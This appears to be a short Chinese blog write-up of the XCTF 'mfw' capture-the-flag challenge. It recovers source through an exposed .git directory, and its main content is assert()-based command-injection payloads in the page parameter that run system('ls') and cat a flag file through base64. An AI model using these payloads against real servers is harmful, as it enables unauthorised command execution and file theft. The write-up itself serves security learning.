XCTF-mfw
2024-09-08 10:51:50
mfw
mfw是什么东西???
看题:
进来只有几个标签,挨着点一遍,到About页面
看到了Git,猜测有git泄露,访问/.git/HEAD
成功
上Githack,但是会一直重复
按了一次ctrl+c
就好了
有没有哪位大哥知道这是什么问题
然后用git log
和 git diff
试了一下,什么都没有,只好去看看代码
看到index.php
的时候
发现assert
里面的$file
是可控的,所以可以进行命令注入
尝试?page=flag.php','..')==false and system('ls') and strpos('templates/flag
有回显,这里重复两次是因为红框下面还有一句assert
尝试爆flag?page=flag.php','..')==false and system('cat templates/flag.php') and strpos('templates/flag
!!!竟然没显示,然后试了好多都不行,最后想到返回php文件会因为特殊符号而报错,所以使用base64
payload:flag.php','..')==false and system('cat templates/flag.php | base64') and strpos('templates/flag
最新文章
- 项目开发(Require + E.js)
- 为input输入框添加圆角并去除阴影
- window10 安装出现the error code is 2503错误的解决方法
- 为什么要在html和body加上“height:100%;”
- 初学java之JFrame窗口模式
- 【LeetCode】6. ZigZag Conversion 锯齿形转换
- Java基本开发环境搭建
- [原创]javascript prototype 对象 函数 <;精简的美丽......>;
- 即时作图新工具—ProcessOn【推荐】
- Java中equals和==之间的区别
- PID控制器介绍
- [HNOI2010]平面图判定
- DevSecOps 运维模式中的安全性
- Tools - Windows系统下的命令行工具Cmder
- locust的安装与使用
- mybatis mapper使用记录
- Popupwindow全屏问题
- 36. Valid Sudoku (Array; HashTable)
- 【poj3133】 Manhattan Wiring
- Redis自学笔记 --string类型